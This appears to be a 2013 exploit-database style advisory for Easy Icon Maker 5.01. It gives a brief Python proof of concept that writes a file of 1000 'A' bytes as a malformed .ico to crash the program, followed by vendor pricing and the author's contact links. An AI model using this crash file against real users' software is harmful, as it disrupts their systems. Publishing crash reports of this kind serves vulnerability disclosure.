1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
# Exploit Title: Easy Icon Maker Version 5.01 Crash Poc vulnerability # Date: 28-04-2013 # Exploit Author: Asesino04 # Vendor Homepage: [link] # Software Link: http://www.icon-maker.com/iconmaker.exe # Version: 5.01 & old versions # Tested on: [ Windows 7] # Introduction : ----------------- Easy icon maker is suffering from a crash pocvulnerability # About Vendor : ----------------- *** Pricing *** Single-User License:US$29.95 2 Computers License:US$39.95 10 Computers License: US$99.00 Site License US$ 299.00 # Exploit Code (python) : ------------------ # !/usr/bin/python poc= "\x41" * 1000 file = open("asesino04.ico","w") file.write(poc) file.close() # Contact : ------------------ # Fane Page : www.facebook.com/Th3.Black.D3Vils # Youtube: www.youtube.com/user/Th3BlackDevils # Facebook : www.facebook.com/DevilsDz # Email: mr.k4rizma@gmail.com |